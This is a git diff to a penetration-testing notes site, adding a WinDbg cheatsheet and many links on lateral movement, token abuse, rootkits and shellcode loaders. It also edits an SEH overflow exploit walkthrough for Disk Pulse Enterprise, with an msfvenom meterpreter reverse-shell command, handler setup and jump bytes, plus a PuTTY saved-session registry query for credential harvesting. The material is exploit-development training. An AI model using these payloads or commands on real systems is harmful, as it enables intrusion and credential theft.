diff --git a/.gitbook/assets/avatar.png b/.gitbook/assets/avatar.png
new file mode 100644
index 0000000..3b22ed4
Binary files /dev/null and b/.gitbook/assets/avatar.png differ
diff --git a/SUMMARY.md b/SUMMARY.md
index ac5331c..3422df5 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -213,6 +213,7 @@
 - [OSCP BOF](expdev/bof/oscp-bof.md)
 - [OSED SEH Overflow](expdev/bof/osed-sehof.md)
 * [RE](expdev/re/README.md)
+* [WinDbg](expdev/windbg.md)
 ## ⚙️ Admin
diff --git a/expdev/bof/osed-sehof.md b/expdev/bof/osed-sehof.md
index 3792309..f2a0907 100644
--- a/expdev/bof/osed-sehof.md
+++ b/expdev/bof/osed-sehof.md
@@ -150,7 +150,7 @@ send(buf)
 In case the bad characters cause the SEH overflow not happen at all, this command can help to speed up the debug routine:
 ```
-PS > Restart-Service "Vuln Service"; .\DbgX.Shell.exe -pn vulnsvc.exe -c 'g; !exchain'; sleep 3; python C:\sehof_bad_chars.py
+PS > Restart-Service "Disk Pulse Enterprise"; .\DbgX.Shell.exe -pn diskpls.exe -c 'g; !exchain'; sleep 3; python C:\sehof_bad_chars.py
 ```
 In case the bad characters are truncated from memory, dump the bytes (*EstablisherFrame* - the second argument of the vulnerable *ExecuteHandler*) and examine them manually or use [find-bad-chars.py](https://github.com/epi052/osed-scripts/blob/main/find-bad-chars.py) by [@epi052](https://twitter.com/epi052):
@@ -173,7 +173,7 @@ Or
 ## 4. Search for P/P/R Sequence
-P/P/R == `pop R32, pop R32, ret`:
+P/P/R is `pop R32, pop R32, ret`:
 ```
 $ msf-nasm_shell
@@ -281,7 +281,7 @@ Search with [find-ppr.py](https://github.com/epi052/osed-scripts/blob/main/find-
 Break on the P/P/R and assemble a short jump over the *Next* structure exception handler:
 ```
-PS > Restart-Service "Vuln Service"; .\DbgX.Shell.exe -pn vulnsvc.exe -c 'g; bp 0x101576c0; g'; sleep 2; python C:\sehof_ppr.py
+PS > Restart-Service "Disk Pulse Enterprise"; .\DbgX.Shell.exe -pn diskpls.exe -c 'g; bp 0x101576c0; g'; sleep 2; python C:\sehof_ppr.py
 Breakpoint 0 hit
 eax=00000000 ebx=00000000 ecx=101576c0 edx=77e06fa0 esi=00000000 edi=00000000
@@ -492,9 +492,12 @@ Evaluate expression: -14084 = ffffc8fc
 And then assemble an appropriate jump:
-```
-jmp 0xffffc8fc
-0: e9 f8 c8 ff ff jmp ffffc8fd <_main+0xffffc8fd>
+```python
+>>> from keystone import *
+>>> ks = Ks(KS_ARCH_X86, KS_MODE_32)
+>>> jump = [f'\\x{int(opcode):02x}' for opcode in ks.asm("jmp 0xffffc8fc;")[0]]
+>>> print(f"""b'{''.join(jump)}'""")
+("\xe9\xf7\xc8\xff\xff")
 ```
@@ -510,7 +513,7 @@ size = 6000
 shellcode_size = 600
 shellcode = b'\x90' * 20
-# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=1337 EXITFUNC=thread -b "\x00\x09\x0a\x0d\x20" -e x86/shikata_ga_nai -f python -v shellcode
+# msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=1337 EXITFUNC=thread -b "\x00\x09\x0a\x0d\x20" -e x86/shikata_ga_nai -f python -v shellcode
 # sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST eth0; set LPORT 1337; set EXITFUNC thread; run'
 shellcode += b""
 shellcode += b'C' * (shellcode_size - len(shellcode))
@@ -520,7 +523,7 @@ exp += LE(0x101576c0) # (PPR) pop eax; pop ebx; ret
 exp += b'\x90\x90' # (NSEH) offset for the 'eb 06' part of the jmp instruction
 #exp += b'\x66\x81\xc4\x52\x0f' # (Island Hop) add sp, 0xf50
 #exp += b'\xff\xe4' # (Island Hop) jmp esp
-exp += b'\xe9\xf8\xc8\xff\xff' # jmp 0xffffc8fc
+exp += b'\xe9\xf7\xc8\xff\xff' # jmp 0xffffc8fc
 filler = b'A' * (2499 - 4)
 nop = b'\x90' * (size - len(filler + exp + shellcode))
diff --git a/expdev/windbg.md b/expdev/windbg.md
new file mode 100644
index 0000000..7b262cf
--- /dev/null
+++ b/expdev/windbg.md
@@ -0,0 +1,187 @@
+# WinDbg
+
+
+
+
+## Install
+
+- [https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/](https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/)
+- [https://github.com/TimMisiak/windup](https://github.com/TimMisiak/windup)
+
+Get the latest version (stolen from [here](https://stackoverflow.com/a/77062861/6253579)):
+
+```bash
+wget --quiet --continue --no-check-certificate -O windbg.appinstaller https://aka.ms/windbg/download
+grep -ioP "htt.*bundle" windbg.appinstaller > msix.txt
+wget --quiet --continue --no-check-certificate -i msix.txt
+7z.exe x windbg.msixbundle
+7z.exe x *x64.msix -owindbgnew
+cd windbgnew
+start dbgx.shell.exe
+```
+
+
+
+### Symbols
+
+- [https://github.com/p0dalirius/pdbdownload](https://github.com/p0dalirius/pdbdownload)
+
+
+
+
+## Cheatsheet
+
+Load debugging symbols:
+
+```
+> srv*c:\symbols*https://msdl.microsoft.com/download/symbols
+> .reload /f
+```
+
+Unassemble from memory:
+
+```
+> u kernel32!GetCurrentThread
+```
+
+Read bytes from memory:
+
+```
+> db esp [L1]
+> db 41414141
+> db kernel32!WriteFile
+
+> dw esp
+> dd esp
+> dq esp
+
+> dW/dc KERNELBASE+0x40
+```
+
+Read data at a specified address:
+
+```
+> dd esp L1
+41414141
+> dd 41414141
+// The same as pointer to data
+> dd poi(esp)
+```
+
+Dump structures:
+
+```
+> dt ntdll!_TEB
+> dt -r ntdll!_TEB @$teb ThreadLocalStoragePointer
+> dt -r ntdll!_TEB @$teb
+
+> ?? 
sizeof(ntdll!_TEB)
+```
+
+Edit bytes:
+
+```
+> dd esp L1
+> ed esp 41414141
+> dd esp L1
+
+> da esp
+> ea esp "AAAA"
+> da esp
+```
+
+Search memory space:
+
+```
+> ed esp 41414141
+> s -d 0 L?80000000 41414141
+
+> s -a 0 L?80000000 "This program cannot be run in DOS mode"
+```
+
+Work with registers:
+
+```
+> r
+> r eax
+> r eax=41414141
+```
+
+Work with software breakpoints:
+
+```
+> bp kernel32!WriteFile
+> bl
+> bd 0
+> be 0
+> bc 0
+> bc *
+
+> lm m ole32
+> bu ole32!WriteStringStream
+> bl
+```
+
+Breakpoints and actions:
+
+```
+BOOL WriteFile(
+ HANDLE hFile,
+ LPCVOID lpBuffer,
+ DWORD nNumberOfBytesToWrite, // Write to file "hello" -> "db esp+0x0c L1" is 04 (length of "hello", also in esi register)
+ LPDWORD lpNumberOfBytesWritten,
+ LPOVERLAPPED lpOverlapped
+);
+
+> bp kernel32!WriteFile ".printf \"The number of bytes written is: %p\", poi(esp + 0x0C);.echo;g"
+> bp kernel32!WriteFile ".if (poi(esp + 0x0C) != 4) {gc} .else {.printf \"The number of bytes written is 4\";.echo;}"
+> bp kernel32!WriteFile ".if (@esi != 4) {gc} .else {.printf \"The number of bytes written is 4\";.echo;}"
+```
+
+Work with hardware breakpoints:
+
+```
+// Before: write "w00tw00t" to a file, save the file, close Notepad, re-open the file
+> s -a 0x0 L?80000000 w00tw00t
+> s -u 0x0 L?80000000 w00tw00t
+> ba w 2 00b8b238
+> du
+00b8b238 "a00tw00t"
+```
+
+![[Pasted image 20230924234241.png]]
+
+Step through code:
+
+```
+> p // step over
+> t // step into
+> pt // step to next return
+> ph // execute code until a branching instruction is reached
+```
+
+List modules and symbols:
+
+```
+> .reload /f
+> lm
+> lm m kernel*
+> x kernelbase!CreateProc*
+```
+
+Evaluation and output formats:
+
+```
+> ? ((41414141 - 414141) * 0n10) >> 8
+> ? 41414141
+> ? 0n41414141
+> ? 0y10101010
+> .formats 41414141
+```
+
+Pseudo registers:
+
+```
+> r @$t0 = (41414141 - 414141) * 0n10
+> ? @$t0 >> 8
+```
diff --git a/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md b/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md
index fc5b2ce..1c6b447 100644
--- a/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md
+++ b/pentest/infrastructure/ad/credential-harvesting/ssh-clients.md
@@ -12,6 +12,7 @@
 ```
 Cmd > reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
 Cmd > reg query "HKEY_USERS\\Software\SimonTatham\PuTTY\Sessions" /s
+PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions\" -Recurse
 ```
diff --git a/pentest/infrastructure/ad/lateral-movement/rpc.md b/pentest/infrastructure/ad/lateral-movement/rpc.md
index 0007a60..17e27da 100644
--- a/pentest/infrastructure/ad/lateral-movement/rpc.md
+++ b/pentest/infrastructure/ad/lateral-movement/rpc.md
@@ -197,3 +197,5 @@ namespace SharpSCExec
 - [[PDF] Unorthodox Lateral Movement (Riccardo Ancarani)](https://github.com/RiccardoAncarani/talks/blob/master/F-Secure/unorthodox-lateral-movement.pdf)
 - [https://github.com/netero1010/ScheduleRunner](https://github.com/netero1010/ScheduleRunner)
 - [https://github.com/netero1010/GhostTask](https://github.com/netero1010/GhostTask)
+- [https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2](https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2)
+- [https://github.com/dmcxblue/SharpGhostTask](https://github.com/dmcxblue/SharpGhostTask)
diff --git a/pentest/infrastructure/ad/post-exploitation.md b/pentest/infrastructure/ad/post-exploitation.md
index c67aa9c..fbb023f 100644
--- a/pentest/infrastructure/ad/post-exploitation.md
+++ b/pentest/infrastructure/ad/post-exploitation.md
@@ -167,6 +167,15 @@ PS > Disable-NetFirewallRule FPS-SMB-In-TCP*
 ```
+#### RpcShadow2
+
+- [https://red.c3r3br4t3.com/red-team-operations/lateral-movement/shadowrdp](https://red.c3r3br4t3.com/red-team-operations/lateral-movement/shadowrdp)
+- [https://github.com/c3r3br4t3/ShadowRDP](https://github.com/c3r3br4t3/ShadowRDP)
+- [https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/4c6481f4-a1cc-4c76-abc1-3ece834e6451](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/4c6481f4-a1cc-4c76-abc1-3ece834e6451)
+- [https://learn.microsoft.com/en-gb/windows/win32/api/rdpencomapi/nn-rdpencomapi-irdpsrapisharingsession](https://learn.microsoft.com/en-gb/windows/win32/api/rdpencomapi/nn-rdpencomapi-irdpsrapisharingsession)
+- [http://www.rohitab.com/discuss/topic/41626-rdp-com-server-client/](http://www.rohitab.com/discuss/topic/41626-rdp-com-server-client/)
+
+
 ## Run on Domain Computers
diff --git a/pentest/infrastructure/ad/privileges-abuse/seimpersonate/README.md b/pentest/infrastructure/ad/privileges-abuse/seimpersonate/README.md
index 2d400b8..cb3a1c8 100644
--- a/pentest/infrastructure/ad/privileges-abuse/seimpersonate/README.md
+++ b/pentest/infrastructure/ad/privileges-abuse/seimpersonate/README.md
@@ -6,3 +6,12 @@
 ## Restore Privileges
 * [https://itm4n.github.io/localservice-privileges/](https://itm4n.github.io/localservice-privileges/)
+
+
+
+
+## Leaked Handles
+
+- [https://www.tarlogic.com/blog/token-handles-abuse/](https://www.tarlogic.com/blog/token-handles-abuse/)
+- [https://github.com/blackarrowsec/Handly](https://github.com/blackarrowsec/Handly)
+- [https://rastamouse.me/safehandle-vs-intptr/](https://rastamouse.me/safehandle-vs-intptr/)
diff --git a/pentest/infrastructure/ad/token-manipulation.md b/pentest/infrastructure/ad/token-manipulation.md
index 346edfe..530a800 100644
--- a/pentest/infrastructure/ad/token-manipulation.md
+++ b/pentest/infrastructure/ad/token-manipulation.md
@@ -7,6 +7,8 @@
 - [https://xret2pwn.github.io//Building-Token-Vault-Part0x02/](https://xret2pwn.github.io//Building-Token-Vault-Part0x02/)
 - [https://rastamouse.me/token-impersonation-in-csharp/](https://rastamouse.me/token-impersonation-in-csharp/)
 - [https://xakep.ru/2022/12/06/win-api-secrets/](https://xakep.ru/2022/12/06/win-api-secrets/)
+- [https://ardent101.github.io/posts/tokens_theory/](https://ardent101.github.io/posts/tokens_theory/)
+- [https://habr.com/ru/articles/776298/](https://habr.com/ru/articles/776298/)
 - [[PDF] Technical Analysis of Access Token Theft and Manipulation (McAfee)](https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf)
 ![Access Token Theft and Manipulation (McAfee)](/.gitbook/assets/011.png)
diff --git a/pentest/infrastructure/networks/README.md b/pentest/infrastructure/networks/README.md
index c284a84..367e0b1 100644
--- a/pentest/infrastructure/networks/README.md
+++ b/pentest/infrastructure/networks/README.md
@@ -1,4 +1,4 @@
-# Network
+# Networks
 - [https://github.com/frostbits-security/MITM-cheatsheet](https://github.com/frostbits-security/MITM-cheatsheet)
 - [https://xakep.ru/2021/08/25/stp-yersinia/](https://xakep.ru/2021/08/25/stp-yersinia/)
@@ -8,3 +8,12 @@
 {% embed url="https://youtu.be/JdeE4TQ3OsM" %}
 {% embed url="https://www.youtube.com/live/a-S_Sg2gyXo?feature=share" %}
+
+
+
+
+## NAT Hole Punching
+
+- [https://habr.com/ru/articles/763164/](https://habr.com/ru/articles/763164/)
+- [https://github.com/dwoz/python-nat-hole-punching](https://github.com/dwoz/python-nat-hole-punching)
+- [https://github.com/penumbra23/peerko](https://github.com/penumbra23/peerko)
diff --git a/pentest/infrastructure/persistence.md b/pentest/infrastructure/persistence.md
index f8ce46d..eb28a8d 100644
--- a/pentest/infrastructure/persistence.md
+++ b/pentest/infrastructure/persistence.md
@@ -273,3 +273,4 @@ $ pkill gs-bd
 ### Rootkits
 * [0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485](https://0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485)
+* [https://github.com/eeriedusk/nysm](https://github.com/eeriedusk/nysm)
diff --git a/pentest/infrastructure/post-exploitation.md b/pentest/infrastructure/post-exploitation.md
index d9f7804..e05b538 100644
--- a/pentest/infrastructure/post-exploitation.md
+++ b/pentest/infrastructure/post-exploitation.md
@@ -11,6 +11,7 @@ description: General Post Exploitation
 - [https://github.com/blendin/3snake](https://github.com/blendin/3snake)
 - [https://github.com/hackerschoice/ssh-key-backdoor](https://github.com/hackerschoice/ssh-key-backdoor)
+- [https://github.com/MegaManSec/SSH-Snake](https://github.com/MegaManSec/SSH-Snake)
 Search SSH logs for connection source IPs:
diff --git a/redteam/maldev/code-injection/README.md b/redteam/maldev/code-injection/README.md
index 273f6b4..a66f4ba 100644
--- a/redteam/maldev/code-injection/README.md
+++ b/redteam/maldev/code-injection/README.md
@@ -331,6 +331,8 @@ int main(int argc, char** argv)
 - [https://www.r-tec.net/r-tec-blog-process-injection-avoiding-kernel-triggered-memory-scans.html](https://www.r-tec.net/r-tec-blog-process-injection-avoiding-kernel-triggered-memory-scans.html)
 - [https://github.com/S3cur3Th1sSh1t/Caro-Kann](https://github.com/S3cur3Th1sSh1t/Caro-Kann)
+- [https://caueb.com/attackdefense/threadlessstompingkann/](https://caueb.com/attackdefense/threadlessstompingkann/)
+- [https://github.com/caueb/ThreadlessStompingKann](https://github.com/caueb/ThreadlessStompingKann)
@@ -421,12 +423,27 @@ VerifierEnumerateResource
 ## PE to Shellcode
-- [https://github.com/monoxgas/sRDI](https://github.com/monoxgas/sRDI)
-- [https://github.com/TheWover/donut](https://github.com/TheWover/donut)
 - [https://github.com/hasherezade/pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode)
 - [https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/](https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/)
 - [https://github.com/paranoidninja/PIC-Get-Privileges](https://github.com/paranoidninja/PIC-Get-Privileges)
+
+
+### sRDI
+
+- [https://github.com/monoxgas/sRDI](https://github.com/monoxgas/sRDI)
+
+
+
+### Donut
+
+- [https://thewover.github.io/Introducing-Donut/](https://thewover.github.io/Introducing-Donut/)
+- [https://thewover.github.io/Cruller/](https://thewover.github.io/Cruller/)
+- [https://github.com/TheWover/donut](https://github.com/TheWover/donut)
+- [https://github.com/S4ntiagoP/donut/tree/syscalls](https://github.com/S4ntiagoP/donut/tree/syscalls)
+- [https://github.com/Binject/go-donut](https://github.com/Binject/go-donut)
+- [https://github.com/listinvest/undonut]https://github.com/listinvest/undonut()
+
 [Example](https://github.com/l4ckyguy/ukn0w/commit/0823f51d01790ef53aa9406f99b6a75dfff7f146) with [SharpHound.exe](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe) and donut (C# cross-compilation is done with [Mono](https://www.mono-project.com/download/stable/)):
 {% code title="sweetblood.sh" %}
@@ -481,6 +498,14 @@ This technique is enhanced and automated [here](https://gist.github.com/snovvcra
+### CLRvoyance
+
+- [https://github.com/Accenture/CLRvoyance](https://github.com/Accenture/CLRvoyance)
+- [https://github.com/kyleavery/ThirdEye](https://github.com/kyleavery/ThirdEye)
+- [https://web.archive.org/web/20230601160135/https://www.accenture.com/us-en/blogs/cyber-defense/clrvoyance-loading-managed-code-into-unmanaged-processes](https://web.archive.org/web/20230601160135/https://www.accenture.com/us-en/blogs/cyber-defense/clrvoyance-loading-managed-code-into-unmanaged-processes)
+
+
+
 ## PE Injection